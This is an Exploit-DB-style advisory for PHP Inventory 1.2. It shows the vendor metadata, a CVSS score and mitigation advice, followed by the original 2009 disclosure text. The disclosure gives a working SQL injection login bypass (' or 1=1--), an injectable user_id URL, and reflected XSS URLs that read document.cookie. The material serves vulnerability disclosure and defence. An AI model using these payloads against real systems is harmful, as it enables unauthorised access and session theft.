PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerability

vendor:

PHP Inventory

by:

mr_me

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Inventory

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:phpwares:php_inventory:1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista

2009

PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerability

The app is riddled with SQL Injection. For example, an attacker can send a malicious URL to the application with a crafted SQL injection payload, such as ' or 1=1--, which can be used to bypass authentication and gain access to the application. Additionally, an attacker can also perform reflected XSS attacks by sending a malicious URL with a crafted script payload, such as '><script>alert(document.cookie)</script>.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, output encoding should be used to prevent reflected XSS attacks.

Source

Exploit-DB raw data:

#################################################################
#
# PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerabiity
# Found By: mr_me
# Download: http://www.phpwares.com/content/php-inventory
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################

First of all lets login to admin with:

http://[server]/php-inventory/index.php

username: ' or 1=1--
password: ' or 1=1--

The app is riddled with SQL Injection. For example:

http://[server]/php-inventory/index.php?sub=users&action=details&user_id=[SQLI]

SELECT * FROM `site_users` WHERE `user_id`='1003''You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1003''' at line 1

This of course means you can do some slightly dodgy refected XSS:

http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)</script>

I leave the exploiting up to the reader.